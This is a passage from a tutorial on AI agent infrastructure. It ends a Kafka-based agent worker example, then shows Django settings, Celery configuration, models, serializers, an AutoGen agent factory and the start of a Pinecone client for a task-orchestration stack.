134 async def protected_llm_call(client, prompt, model="gpt-4"):
135 # This would be your actual LLM API call
136 response = await client.chat.completions.create(
137 model=model,
138 messages=[{"role": "user", "content": prompt}],
139 max_tokens=1000
140 )
141 return response
142
143 return protected_llm_call
144
145# Example usage in agent implementation
146async def agent_worker():
147 consumer = AIOKafkaConsumer(
148 AGENT_REQUEST_TOPIC,
149 bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
150 group_id="agent-worker-group",
151 value_deserializer=lambda m: json.loads(m.decode('utf-8')),
152 auto_offset_reset="earliest",
153 enable_auto_commit=True
154 )
155
156 await consumer.start()
157
158 # Create OpenAI client
159 from openai import AsyncOpenAI
160 client = AsyncOpenAI(api_key=os.environ.get("OPENAI_API_KEY"))
161
162 # Create protected LLM call function with backoff and circuit breaker
163 protected_llm = backoff_llm_call(max_tries=3, max_time=45)
164
165 try:
166 async for message in consumer:
167 request_data = message.value
168 request_id = request_data.get("request_id")
169
170 start_time = datetime.now()
171
172 try:
173 # Process with resilience patterns
174 query = request_data.get("query")
175
176 try:
177 # Make resilient LLM call
178 llm_response = await protected_llm(client, query)
179
180 # Process response
181 response_content = llm_response.choices[0].message.content
182
183 # Calculate processing time
184 processing_time = (datetime.now() - start_time).total_seconds()
185
186 # Send response
187 await producer.send_and_wait(
188 AGENT_RESPONSE_TOPIC,
189 {
190 "request_id": request_id,
191 "status": "success",
192 "response": response_content,
193 "processing_time": processing_time,
194 "timestamp": datetime.now().isoformat()
195 }
196 )
197
198 except Exception as e:
199 # Handle failures with proper error reporting
200 processing_time = (datetime.now() - start_time).total_seconds()
201
202 await producer.send_and_wait(
203 AGENT_RESPONSE_TOPIC,
204 {
205 "request_id": request_id,
206 "status": "error",
207 "error": str(e),
208 "processing_time": processing_time,
209 "timestamp": datetime.now().isoformat()
210 }
211 )
212
213 # Also log the error for monitoring
214 statsd.increment("agent.error", tags=[
215 f"error_type:{type(e).__name__}",
216 f"request_id:{request_id}"
217 ])
218
219 except Exception as e:
220 # Catch-all exception handler to prevent worker crashes
221 print(f"Critical error in message processing: {e}")
222
223 # Log critical errors for immediate attention
224 statsd.increment("agent.critical_error", tags=[
225 f"error_type:{type(e).__name__}"
226 ])
227
228 finally:
229 await consumer.stop()

This stack is particularly well-suited for organizations that need to:

  • Process streaming data in real-time with AI analysis
  • Build responsive event-driven systems
  • Implement asynchronous request/response patterns
  • Support high-throughput messaging with reliable delivery
  • Maintain a flexible, decoupled architecture

Django/Flask + Celery + AutoGen + Pinecone (Task Orchestration & Search)

This stack is optimized for applications that require robust task management, background processing, and sophisticated search capabilities. It's particularly well-suited for document processing, content recommendation, and task-based AI workflows.

Architecture Overview:

Django + Celery + AutoGen Architecture

The architecture consists of:

  1. Django/Flask: Web framework for user interaction and API endpoints
  2. Celery: Distributed task queue for background processing
  3. Redis/RabbitMQ: Message broker for Celery tasks
  4. AutoGen: Multi-agent orchestration framework
  5. Pinecone: Vector database for semantic search
  6. PostgreSQL: Relational database for application data and task state

Implementation Example:

Let's implement a Django application with Celery tasks for AI agent processing:

First, the Django project structure:

text
1project/
2├── manage.py
3├── requirements.txt
4├── project/
5│ ├── __init__.py
6│ ├── settings.py
7│ ├── urls.py
8│ └── celery.py
9├── agent_app/
10│ ├── __init__.py
11│ ├── admin.py
12│ ├── apps.py
13│ ├── models.py
14│ ├── serializers.py
15│ ├── tasks.py
16│ ├── tests.py
17│ ├── urls.py
18│ ├── utils/
19│ │ ├── __init__.py
20│ │ ├── agent_factory.py
21│ │ ├── pinecone_client.py
22│ │ └── prompt_templates.py
23│ └── views.py
24└── templates/
25 └── index.html

Now, let's implement the core components:

python
1# project/settings.py
2import os
3from pathlib import Path
4
5# Build paths inside the project like this: BASE_DIR / 'subdir'.
6BASE_DIR = Path(__file__).resolve().parent.parent
7
8# SECURITY WARNING: keep the secret key used in production secret!
9SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'django-insecure-key-for-dev')
10
11# SECURITY WARNING: don't run with debug turned on in production!
12DEBUG = os.environ.get('DJANGO_DEBUG', 'False') == 'True'
13
14ALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', 'localhost,127.0.0.1').split(',')
15
16# Application definition
17INSTALLED_APPS = [
18 'django.contrib.admin',
19 'django.contrib.auth',
20 'django.contrib.contenttypes',
21 'django.contrib.sessions',
22 'django.contrib.messages',
23 'django.contrib.staticfiles',
24 'rest_framework',
25 'django_celery_results',
26 'django_celery_beat',
27 'agent_app',
28]
29
30MIDDLEWARE = [
31 'django.middleware.security.SecurityMiddleware',
32 'django.contrib.sessions.middleware.SessionMiddleware',
33 'django.middleware.common.CommonMiddleware',
34 'django.middleware.csrf.CsrfViewMiddleware',
35 'django.contrib.auth.middleware.AuthenticationMiddleware',
36 'django.contrib.messages.middleware.MessageMiddleware',
37 'django.middleware.clickjacking.XFrameOptionsMiddleware',
38]
39
40ROOT_URLCONF = 'project.urls'
41
42TEMPLATES = [
43 {
44 'BACKEND': 'django.template.backends.django.DjangoTemplates',
45 'DIRS': [BASE_DIR / 'templates'],
46 'APP_DIRS': True,
47 'OPTIONS': {
48 'context_processors': [
49 'django.template.context_processors.debug',
50 'django.template.context_processors.request',
51 'django.contrib.auth.context_processors.auth',
52 'django.contrib.messages.context_processors.messages',
53 ],
54 },
55 },
56]
57
58WSGI_APPLICATION = 'project.wsgi.application'
59
60# Database
61DATABASES = {
62 'default': {
63 'ENGINE': 'django.db.backends.postgresql',
64 'NAME': os.environ.get('POSTGRES_DB', 'agent_db'),
65 'USER': os.environ.get('POSTGRES_USER', 'postgres'),
66 'PASSWORD': os.environ.get('POSTGRES_PASSWORD', 'postgres'),
67 'HOST': os.environ.get('POSTGRES_HOST', 'localhost'),
68 'PORT': os.environ.get('POSTGRES_PORT', '5432'),
69 }
70}
71
72# Internationalization
73LANGUAGE_CODE = 'en-us'
74TIME_ZONE = 'UTC'
75USE_I18N = True
76USE_TZ = True
77
78# Static files (CSS, JavaScript, Images)
79STATIC_URL = 'static/'
80STATIC_ROOT = BASE_DIR / 'static'
81
82# Default primary key field type
83DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
84
85# Celery settings
86CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', 'redis://localhost:6379/0')
87CELERY_RESULT_BACKEND = 'django-db'
88CELERY_CACHE_BACKEND = 'django-cache'
89CELERY_ACCEPT_CONTENT = ['json']
90CELERY_TASK_SERIALIZER = 'json'
91CELERY_RESULT_SERIALIZER = 'json'
92CELERY_TIMEZONE = TIME_ZONE
93CELERY_TASK_TRACK_STARTED = True
94CELERY_TASK_TIME_LIMIT = 30 * 60 # 30 minutes
95CELERY_WORKER_CONCURRENCY = 8
96
97# REST Framework settings
98REST_FRAMEWORK = {
99 'DEFAULT_AUTHENTICATION_CLASSES': [
100 'rest_framework.authentication.SessionAuthentication',
101 'rest_framework.authentication.TokenAuthentication',
102 ],
103 'DEFAULT_PERMISSION_CLASSES': [
104 'rest_framework.permissions.IsAuthenticated',
105 ],
106 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
107 'PAGE_SIZE': 20
108}
109
110# AI Agent settings
111OPENAI_API_KEY = os.environ.get('OPENAI_API_KEY')
112PINECONE_API_KEY = os.environ.get('PINECONE_API_KEY')
113PINECONE_ENVIRONMENT = os.environ.get('PINECONE_ENVIRONMENT', 'us-west1-gcp')
114PINECONE_INDEX_NAME = os.environ.get('PINECONE_INDEX_NAME', 'agent-knowledge')
115
116# Logging configuration
117LOGGING = {
118 'version': 1,
119 'disable_existing_loggers': False,
120 'formatters': {
121 'verbose': {
122 'format': '{levelname} {asctime} {module} {process:d} {thread:d} {message}',
123 'style': '{',
124 },
125 'simple': {
126 'format': '{levelname} {message}',
127 'style': '{',
128 },
129 },
130 'handlers': {
131 'console': {
132 'level': 'INFO',
133 'class': 'logging.StreamHandler',
134 'formatter': 'verbose',
135 },
136 'file': {
137 'level': 'DEBUG',
138 'class': 'logging.FileHandler',
139 'filename': os.path.join(BASE_DIR, 'logs/django.log'),
140 'formatter': 'verbose',
141 },
142 },
143 'loggers': {
144 'django': {
145 'handlers': ['console', 'file'],
146 'level': 'INFO',
147 'propagate': True,
148 },
149 'agent_app': {
150 'handlers': ['console', 'file'],
151 'level': 'DEBUG',
152 'propagate': False,
153 },
154 },
155}
156
157# Create logs directory if it doesn't exist
158os.makedirs(os.path.join(BASE_DIR, 'logs'), exist_ok=True)
python
1# project/celery.py
2import os
3from celery import Celery
4
5# Set the default Django settings module
6os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')
7
8# Create the Celery app
9app = Celery('project')
10
11# Using a string here means the worker doesn't have to serialize
12# the configuration object to child processes.
13app.config_from_object('django.conf:settings', namespace='CELERY')
14
15# Load task modules from all registered Django app configs.
16app.autodiscover_tasks()
17
18# Configure task routes
19app.conf.task_routes = {
20 'agent_app.tasks.process_agent_task': {'queue': 'agent_tasks'},
21 'agent_app.tasks.update_knowledge_base': {'queue': 'knowledge_tasks'},
22 'agent_app.tasks.analyze_document': {'queue': 'document_tasks'},
23 'agent_app.tasks.periodic_agent_check': {'queue': 'scheduled_tasks'},
24}
25
26# Configure task priorities
27app.conf.task_acks_late = True
28app.conf.worker_prefetch_multiplier = 1
29app.conf.task_inherit_parent_priority = True
30
31@app.task(bind=True)
32def debug_task(self):
33 print(f'Request: {self.request!r}')
python
1# project/urls.py
2from django.contrib import admin
3from django.urls import path, include
4
5urlpatterns = [
6 path('admin/', admin.site.urls),
7 path('api/', include('agent_app.urls')),
8]

Now let's define the agent app models:

python
1# agent_app/models.py
2import uuid
3from django.db import models
4from django.contrib.auth.models import User
5from django.utils import timezone
6
7class AgentTask(models.Model):
8 """Model for tracking agent tasks and their status."""
9 STATUS_CHOICES = (
10 ('pending', 'Pending'),
11 ('processing', 'Processing'),
12 ('completed', 'Completed'),
13 ('failed', 'Failed'),
14 ('canceled', 'Canceled'),
15 )
16 PRIORITY_CHOICES = (
17 (1, 'Low'),
18 (2, 'Normal'),
19 (3, 'High'),
20 (4, 'Urgent'),
21 )
22 TYPE_CHOICES = (
23 ('analysis', 'Data Analysis'),
24 ('research', 'Research'),
25 ('document', 'Document Processing'),
26 ('conversation', 'Conversation'),
27 ('generation', 'Content Generation'),
28 ('other', 'Other'),
29 )
30
31 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
32 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='agent_tasks')
33 title = models.CharField(max_length=255)
34 description = models.TextField()
35 task_type = models.CharField(max_length=20, choices=TYPE_CHOICES, default='other')
36 status = models.CharField(max_length=20, choices=STATUS_CHOICES, default='pending')
37 priority = models.IntegerField(choices=PRIORITY_CHOICES, default=2)
38
39 input_data = models.JSONField(default=dict, blank=True)
40 result_data = models.JSONField(default=dict, blank=True, null=True)
41 error_message = models.TextField(blank=True, null=True)
42
43 # Metadata
44 created_at = models.DateTimeField(auto_now_add=True)
45 updated_at = models.DateTimeField(auto_now=True)
46 started_at = models.DateTimeField(null=True, blank=True)
47 completed_at = models.DateTimeField(null=True, blank=True)
48
49 # Celery task ID for tracking
50 celery_task_id = models.CharField(max_length=255, blank=True, null=True)
51
52 # Token usage metrics
53 prompt_tokens = models.IntegerField(default=0)
54 completion_tokens = models.IntegerField(default=0)
55 total_tokens = models.IntegerField(default=0)
56 estimated_cost = models.DecimalField(max_digits=10, decimal_places=6, default=0)
57
58 class Meta:
59 ordering = ['-created_at']
60 indexes = [
61 models.Index(fields=['user', 'status']),
62 models.Index(fields=['task_type']),
63 models.Index(fields=['priority']),
64 ]
65
66 def __str__(self):
67 return f"{self.title} ({self.status})"
68
69 def set_processing(self, celery_task_id=None):
70 """Mark task as processing with the associated Celery task ID."""
71 self.status = 'processing'
72 self.started_at = timezone.now()
73 if celery_task_id:
74 self.celery_task_id = celery_task_id
75 self.save(update_fields=['status', 'started_at', 'celery_task_id', 'updated_at'])
76
77 def set_completed(self, result_data, token_usage=None):
78 """Mark task as completed with results and token usage."""
79 self.status = 'completed'
80 self.completed_at = timezone.now()
81 self.result_data = result_data
82
83 if token_usage:
84 self.prompt_tokens = token_usage.get('prompt_tokens', 0)
85 self.completion_tokens = token_usage.get('completion_tokens', 0)
86 self.total_tokens = token_usage.get('total_tokens', 0)
87 # Calculate estimated cost
88 prompt_cost = self.prompt_tokens * 0.0000015 # $0.0015 per 1000 tokens
89 completion_cost = self.completion_tokens * 0.000002 # $0.002 per 1000 tokens
90 self.estimated_cost = prompt_cost + completion_cost
91
92 self.save()
93
94 def set_failed(self, error_message):
95 """Mark task as failed with error message."""
96 self.status = 'failed'
97 self.error_message = error_message
98 self.completed_at = timezone.now()
99 self.save(update_fields=['status', 'error_message', 'completed_at', 'updated_at'])
100
101class KnowledgeItem(models.Model):
102 """Model for storing knowledge items for agent context."""
103 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
104 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='knowledge_items')
105 title = models.CharField(max_length=255)
106 content = models.TextField()
107
108 # Metadata for filtering and organization
109 source = models.CharField(max_length=255, blank=True)
110 domain = models.CharField(max_length=100, blank=True)
111 tags = models.JSONField(default=list, blank=True)
112
113 # Vector storage tracking
114 vector_id = models.CharField(max_length=255, blank=True, null=True)
115 embedding_model = models.CharField(max_length=100, default="text-embedding-ada-002")
116 last_updated = models.DateTimeField(auto_now=True)
117
118 # Quality metrics
119 relevance_score = models.FloatField(default=0.0)
120 confidence = models.FloatField(default=1.0)
121
122 created_at = models.DateTimeField(auto_now_add=True)
123
124 class Meta:
125 ordering = ['-created_at']
126 indexes = [
127 models.Index(fields=['user', 'domain']),
128 models.Index(fields=['vector_id']),
129 ]
130
131 def __str__(self):
132 return self.title
133
134class Conversation(models.Model):
135 """Model for tracking conversations between users and agents."""
136 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
137 user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='conversations')
138 title = models.CharField(max_length=255, blank=True)
139 created_at = models.DateTimeField(auto_now_add=True)
140 updated_at = models.DateTimeField(auto_now=True)
141 is_active = models.BooleanField(default=True)
142
143 # Metadata
144 topic = models.CharField(max_length=100, blank=True)
145 summary = models.TextField(blank=True)
146
147 class Meta:
148 ordering = ['-updated_at']
149
150 def __str__(self):
151 return self.title or f"Conversation {self.id}"
152
153class Message(models.Model):
154 """Model for storing messages within a conversation."""
155 ROLE_CHOICES = (
156 ('user', 'User'),
157 ('assistant', 'Assistant'),
158 ('system', 'System'),
159 )
160
161 id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
162 conversation = models.ForeignKey(Conversation, on_delete=models.CASCADE, related_name='messages')
163 role = models.CharField(max_length=10, choices=ROLE_CHOICES)
164 content = models.TextField()
165 created_at = models.DateTimeField(auto_now_add=True)
166
167 # Metadata
168 token_count = models.IntegerField(default=0)
169
170 # References to agents if applicable
171 agent_name = models.CharField(max_length=100, blank=True, null=True)
172
173 class Meta:
174 ordering = ['created_at']
175
176 def __str__(self):
177 return f"{self.role} message in {self.conversation}"

Now let's implement the serializers for our API:

python
1# agent_app/serializers.py
2from rest_framework import serializers
3from .models import AgentTask, KnowledgeItem, Conversation, Message
4from django.contrib.auth.models import User
5
6class UserSerializer(serializers.ModelSerializer):
7 class Meta:
8 model = User
9 fields = ['id', 'username', 'email', 'first_name', 'last_name']
10
11class AgentTaskSerializer(serializers.ModelSerializer):
12 user = UserSerializer(read_only=True)
13 duration = serializers.SerializerMethodField()
14
15 class Meta:
16 model = AgentTask
17 fields = [
18 'id', 'user', 'title', 'description', 'task_type', 'status',
19 'priority', 'input_data', 'result_data', 'error_message',
20 'created_at', 'updated_at', 'started_at', 'completed_at',
21 'prompt_tokens', 'completion_tokens', 'total_tokens',
22 'estimated_cost', 'duration'
23 ]
24 read_only_fields = [
25 'id', 'status', 'result_data', 'error_message', 'created_at',
26 'updated_at', 'started_at', 'completed_at', 'prompt_tokens',
27 'completion_tokens', 'total_tokens', 'estimated_cost'
28 ]
29
30 def get_duration(self, obj):
31 """Calculate task duration in seconds if available."""
32 if obj.started_at and obj.completed_at:
33 return (obj.completed_at - obj.started_at).total_seconds()
34 return None
35
36 def create(self, validated_data):
37 """Create a new agent task associated with the current user."""
38 user = self.context['request'].user
39 validated_data['user'] = user
40 return super().create(validated_data)
41
42class KnowledgeItemSerializer(serializers.ModelSerializer):
43 user = UserSerializer(read_only=True)
44
45 class Meta:
46 model = KnowledgeItem
47 fields = [
48 'id', 'user', 'title', 'content', 'source', 'domain',
49 'tags', 'vector_id', 'embedding_model', 'last_updated',
50 'relevance_score', 'confidence', 'created_at'
51 ]
52 read_only_fields = [
53 'id', 'vector_id', 'embedding_model', 'last_updated',
54 'created_at'
55 ]
56
57 def create(self, validated_data):
58 """Create a new knowledge item associated with the current user."""
59 user = self.context['request'].user
60 validated_data['user'] = user
61 return super().create(validated_data)
62
63class MessageSerializer(serializers.ModelSerializer):
64 class Meta:
65 model = Message
66 fields = [
67 'id', 'conversation', 'role', 'content', 'created_at',
68 'token_count', 'agent_name'
69 ]
70 read_only_fields = ['id', 'created_at', 'token_count']
71
72class ConversationSerializer(serializers.ModelSerializer):
73 user = UserSerializer(read_only=True)
74 messages = MessageSerializer(many=True, read_only=True)
75 message_count = serializers.SerializerMethodField()
76
77 class Meta:
78 model = Conversation
79 fields = [
80 'id', 'user', 'title', 'created_at', 'updated_at',
81 'is_active', 'topic', 'summary', 'messages', 'message_count'
82 ]
83 read_only_fields = ['id', 'created_at', 'updated_at']
84
85 def get_message_count(self, obj):
86 return obj.messages.count()
87
88 def create(self, validated_data):
89 """Create a new conversation associated with the current user."""
90 user = self.context['request'].user
91 validated_data['user'] = user
92 return super().create(validated_data)
93
94class ConversationMessageSerializer(serializers.Serializer):
95 """Serializer for adding a message to a conversation."""
96 content = serializers.CharField(required=True)
97 role = serializers.ChoiceField(choices=['user', 'system'], default='user')

Next, let's implement the agent utilities:

python
1# agent_app/utils/agent_factory.py
2import os
3import autogen
4import logging
5from django.conf import settings
6from .pinecone_client import PineconeClient
7from .prompt_templates import get_system_prompt
8
9logger = logging.getLogger('agent_app')
10
11class AgentFactory:
12 """Factory class for creating different types of agents."""
13
14 def __init__(self, user_id=None):
15 self.user_id = user_id
16 self.pinecone_client = PineconeClient()
17
18 def get_config_list(self, model="gpt-4"):
19 """Get LLM configuration list."""
20 return [
21 {
22 "model": model,
23 "api_key": settings.OPENAI_API_KEY
24 }
25 ]
26
27 def create_agent(self, agent_type, context=None):
28 """Create an agent based on the specified type."""
29 if agent_type == "researcher":
30 return self._create_researcher_agent(context)
31 elif agent_type == "analyst":
32 return self._create_analyst_agent(context)
33 elif agent_type == "document_processor":
34 return self._create_document_processor_agent(context)
35 elif agent_type == "conversation":
36 return self._create_conversation_agent(context)
37 else:
38 # Default to a generic assistant agent
39 return self._create_generic_agent(context)
40
41 def create_agent_team(self, task_data):
42 """Create a team of agents for complex tasks."""
43 task_type = task_data.get('task_type')
44
45 if task_type == 'research':
46 return self._create_research_team(task_data)
47 elif task_type == 'analysis':
48 return self._create_analysis_team(task_data)
49 else:
50 # Default team configuration
51 return self._create_default_team(task_data)
52
53 def _create_researcher_agent(self, context=None):
54 """Create a researcher agent specialized in information gathering."""
55 system_message = get_system_prompt("researcher")
56
57 if context:
58 domain = context.get('domain', '')
59 if domain:
60 system_message += f"\nYou are specialized in researching {domain}."
61
62 # Define research-specific functions
63 functions = [
64 {
65 "name": "search_knowledge_base",
66 "description": "Search the knowledge base for relevant information",
67 "parameters": {
68 "type": "object",
69 "properties": {
70 "query": {"type": "string", "description": "The search query"},
71 "domain": {"type": "string", "description": "Optional domain to filter results"},
72 "limit": {"type": "integer", "description": "Maximum number of results to return"}
73 },
74 "required": ["query"]
75 }
76 },
77 {
78 "name": "summarize_sources",
79 "description": "Summarize information from multiple sources",
80 "parameters": {
81 "type": "object",
82 "properties": {
83 "sources": {"type": "array", "items": {"type": "string"}, "description": "List of source texts to summarize"},
84 "max_length": {"type": "integer", "description": "Maximum length of the summary"}
85 },
86 "required": ["sources"]
87 }
88 }
89 ]
90
91 # Create the agent with appropriate configuration
92 agent = autogen.AssistantAgent(
93 name="ResearchAgent",
94 system_message=system_message,
95 llm_config={
96 "config_list": self.get_config_list(),
97 "functions": functions,
98 "temperature": 0.5,
99 "timeout": 600, # 10 minutes timeout for research tasks
100 "cache_seed": None # No caching for research tasks
101 }
102 )
103
104 return agent
105
106 def _create_analyst_agent(self, context=None):
107 """Create an analyst agent specialized in data interpretation."""
108 system_message = get_system_prompt("analyst")
109
110 if context:
111 data_type = context.get('data_type', '')
112 if data_type:
113 system_message += f"\nYou are specialized in analyzing {data_type} data."
114
115 # Define analysis-specific functions
116 functions = [
117 {
118 "name": "analyze_data",
119 "description": "Analyze data and provide insights",
120 "parameters": {
121 "type": "object",
122 "properties": {
123 "data": {"type": "object", "description": "The data to analyze"},
124 "metrics": {"type": "array", "items": {"type": "string"}, "description": "Metrics to calculate"},
125 "visualization": {"type": "boolean", "description": "Whether to suggest visualizations"}
126 },
127 "required": ["data"]
128 }
129 },
130 {
131 "name": "generate_report",
132 "description": "Generate a structured report from analysis",
133 "parameters": {
134 "type": "object",
135 "properties": {
136 "analysis_results": {"type": "object", "description": "Results from data analysis"},
137 "format": {"type": "string", "description": "Report format (e.g., executive, technical)"},
138 "sections": {"type": "array", "items": {"type": "string"}, "description": "Sections to include in the report"}
139 },
140 "required": ["analysis_results"]
141 }
142 }
143 ]
144
145 # Create the agent with appropriate configuration
146 agent = autogen.AssistantAgent(
147 name="AnalystAgent",
148 system_message=system_message,
149 llm_config={
150 "config_list": self.get_config_list("gpt-4"), # Use GPT-4 for analysis
151 "functions": functions,
152 "temperature": 0.3, # Lower temperature for more precise analysis
153 "timeout": 900, # 15 minutes timeout for analysis tasks
154 "cache_seed": None # No caching for analysis tasks
155 }
156 )
157
158 return agent
159
160 def _create_document_processor_agent(self, context=None):
161 """Create an agent specialized in document processing."""
162 system_message = get_system_prompt("document_processor")
163
164 if context:
165 doc_type = context.get('document_type', '')
166 if doc_type:
167 system_message += f"\nYou are specialized in processing {doc_type} documents."
168
169 # Define document processing functions
170 functions = [
171 {
172 "name": "extract_entities",
173 "description": "Extract named entities from text",
174 "parameters": {
175 "type": "object",
176 "properties": {
177 "text": {"type": "string", "description": "The text to analyze"},
178 "entity_types": {"type": "array", "items": {"type": "string"}, "description": "Types of entities to extract"}
179 },
180 "required": ["text"]
181 }
182 },
183 {
184 "name": "classify_document",
185 "description": "Classify document by type and content",
186 "parameters": {
187 "type": "object",
188 "properties": {
189 "text": {"type": "string", "description": "The document text"},
190 "categories": {"type": "array", "items": {"type": "string"}, "description": "Possible categories"}
191 },
192 "required": ["text"]
193 }
194 },
195 {
196 "name": "summarize_document",
197 "description": "Create a concise summary of a document",
198 "parameters": {
199 "type": "object",
200 "properties": {
201 "text": {"type": "string", "description": "The document text"},
202 "max_length": {"type": "integer", "description": "Maximum summary length"}
203 },
204 "required": ["text"]
205 }
206 }
207 ]
208
209 # Create the agent with appropriate configuration
210 agent = autogen.AssistantAgent(
211 name="DocumentAgent",
212 system_message=system_message,
213 llm_config={
214 "config_list": self.get_config_list(),
215 "functions": functions,
216 "temperature": 0.2, # Lower temperature for precision
217 "timeout": 300, # 5 minutes timeout
218 "cache_seed": 42 # Use caching for document tasks
219 }
220 )
221
222 return agent
223
224 def _create_conversation_agent(self, context=None):
225 """Create an agent for interactive conversations."""
226 system_message = get_system_prompt("conversation")
227
228 if context:
229 tone = context.get('tone', '')
230 topic = context.get('topic', '')
231 if tone:
232 system_message += f"\nMaintain a {tone} tone in your responses."
233 if topic:
234 system_message += f"\nYou are specialized in discussing {topic}."
235
236 # Create the agent with conversation-appropriate configuration
237 agent = autogen.AssistantAgent(
238 name="ConversationAgent",
239 system_message=system_message,
240 llm_config={
241 "config_list": self.get_config_list(),
242 "temperature": 0.7, # Higher temperature for more creative conversations
243 "timeout": 120, # 2 minutes timeout for conversational responses
244 "cache_seed": None # No caching for unique conversations
245 }
246 )
247
248 return agent
249
250 def _create_generic_agent(self, context=None):
251 """Create a general-purpose assistant agent."""
252 system_message = get_system_prompt("generic")
253
254 # Create a versatile, general-purpose agent
255 agent = autogen.AssistantAgent(
256 name="AssistantAgent",
257 system_message=system_message,
258 llm_config={
259 "config_list": self.get_config_list(),
260 "temperature": 0.5,
261 "timeout": 180, # 3 minutes timeout
262 "cache_seed": None # No caching
263 }
264 )
265
266 return agent
267
268 def _create_research_team(self, task_data):
269 """Create a team of agents for research tasks."""
270 # Create specialized agents for the research team
271 researcher = self._create_researcher_agent({"domain": task_data.get("domain")})
272 analyst = self._create_analyst_agent({"data_type": "research findings"})
273 writer = autogen.AssistantAgent(
274 name="WriterAgent",
275 system_message=get_system_prompt("writer"),
276 llm_config={
277 "config_list": self.get_config_list(),
278 "temperature": 0.7,
279 "timeout": 300
280 }
281 )
282
283 # Create a user proxy that will coordinate the team
284 user_proxy = autogen.UserProxyAgent(
285 name="ResearchCoordinator",
286 human_input_mode="NEVER",
287 max_consecutive_auto_reply=10,
288 code_execution_config={"work_dir": "research_workspace"}
289 )
290
291 # Create a group chat for the research team
292 groupchat = autogen.GroupChat(
293 agents=[user_proxy, researcher, analyst, writer],
294 messages=[],
295 max_round=15
296 )
297
298 manager = autogen.GroupChatManager(
299 groupchat=groupchat,
300 llm_config={
301 "config_list": self.get_config_list(),
302 "temperature": 0.2
303 }
304 )
305
306 return {
307 "user_proxy": user_proxy,
308 "manager": manager,
309 "agents": [researcher, analyst, writer],
310 "groupchat": groupchat
311 }
312
313 def _create_analysis_team(self, task_data):
314 """Create a team of agents for data analysis tasks."""
315 # Create specialized agents for the analysis team
316 data_processor = autogen.AssistantAgent(
317 name="DataProcessor",
318 system_message=get_system_prompt("data_processor"),
319 llm_config={
320 "config_list": self.get_config_list(),
321 "temperature": 0.2,
322 "timeout": 300
323 }
324 )
325
326 analyst = self._create_analyst_agent({"data_type": task_data.get("data_type", "general")})
327
328 visualization_expert = autogen.AssistantAgent(
329 name="VisualizationExpert",
330 system_message=get_system_prompt("visualization"),
331 llm_config={
332 "config_list": self.get_config_list(),
333 "temperature": 0.4,
334 "timeout": 300
335 }
336 )
337
338 report_writer = autogen.AssistantAgent(
339 name="ReportWriter",
340 system_message=get_system_prompt("report_writer"),
341 llm_config={
342 "config_list": self.get_config_list(),
343 "temperature": 0.6,
344 "timeout": 300
345 }
346 )
347
348 # Create a user proxy that will coordinate the team
349 user_proxy = autogen.UserProxyAgent(
350 name="AnalysisCoordinator",
351 human_input_mode="NEVER",
352 max_consecutive_auto_reply=10,
353 code_execution_config={"work_dir": "analysis_workspace"}
354 )
355
356 # Create a group chat for the analysis team
357 groupchat = autogen.GroupChat(
358 agents=[user_proxy, data_processor, analyst, visualization_expert, report_writer],
359 messages=[],
360 max_round=15
361 )
362
363 manager = autogen.GroupChatManager(
364 groupchat=groupchat,
365 llm_config={
366 "config_list": self.get_config_list(),
367 "temperature": 0.2
368 }
369 )
370
371 return {
372 "user_proxy": user_proxy,
373 "manager": manager,
374 "agents": [data_processor, analyst, visualization_expert, report_writer],
375 "groupchat": groupchat
376 }
377
378 def _create_default_team(self, task_data):
379 """Create a default team of agents for general tasks."""
380 # Create generic agents for a default team
381 planner = autogen.AssistantAgent(
382 name="PlannerAgent",
383 system_message=get_system_prompt("planner"),
384 llm_config={
385 "config_list": self.get_config_list(),
386 "temperature": 0.3,
387 "timeout": 300
388 }
389 )
390
391 executor = autogen.AssistantAgent(
392 name="ExecutorAgent",
393 system_message=get_system_prompt("executor"),
394 llm_config={
395 "config_list": self.get_config_list(),
396 "temperature": 0.5,
397 "timeout": 300
398 }
399 )
400
401 reviewer = autogen.AssistantAgent(
402 name="ReviewerAgent",
403 system_message=get_system_prompt("reviewer"),
404 llm_config={
405 "config_list": self.get_config_list(),
406 "temperature": 0.2,
407 "timeout": 300
408 }
409 )
410
411 # Create a user proxy that will coordinate the team
412 user_proxy = autogen.UserProxyAgent(
413 name="TaskCoordinator",
414 human_input_mode="NEVER",
415 max_consecutive_auto_reply=10,
416 code_execution_config={"work_dir": "task_workspace"}
417 )
418
419 # Create a group chat for the default team
420 groupchat = autogen.GroupChat(
421 agents=[user_proxy, planner, executor, reviewer],
422 messages=[],
423 max_round=10
424 )
425
426 manager = autogen.GroupChatManager(
427 groupchat=groupchat,
428 llm_config={
429 "config_list": self.get_config_list(),
430 "temperature": 0.3
431 }
432 )
433
434 return {
435 "user_proxy": user_proxy,
436 "manager": manager,
437 "agents": [planner, executor, reviewer],
438 "groupchat": groupchat
439 }
python
1# agent_app/utils/pinecone_client.py
2import os
3import pinecone
4import openai
5import numpy as np
6import time
7import logging
8from django.conf import settings
9
10logger = logging.getLogger('agent_app')
11
12class PineconeClient:
13 """Client for interacting with Pinecone vector database."""
14
15 def __init__(self):
16 self.api_key = settings.PINECONE_API_KEY
17 self.environment = settings.PINECONE_ENVIRONMENT
18 self.index_name = settings.PINECONE_INDEX_NAME
19 self.dimension = 1536 # OpenAI embedding dimension
20 self.initialize_pinecone()
21
22 def initialize_pinecone(self):
23 """Initialize Pinecone and ensure index exists."""
24 try:
25 pinecone.init(api_key=self.api_key, environment=self.environment)
26
27 # Check if index exists, if not create it
28 if self.index_name not in pinecone.list_indexes():
29 logger.info(f"Creating Pinecone index: {self.index_name}")
30 pinecone.create_index(
31 name=self.index_name,
32 dimension=self.dimension,
33 metric="cosine",
34 shards=1
35 )
36 # Wait for index to be ready
37 time.sleep(10)
38
39 self.index = pinecone.Index(self.index_name)
40 logger.info(f"Connected to Pinecone index: {self.index_name}")
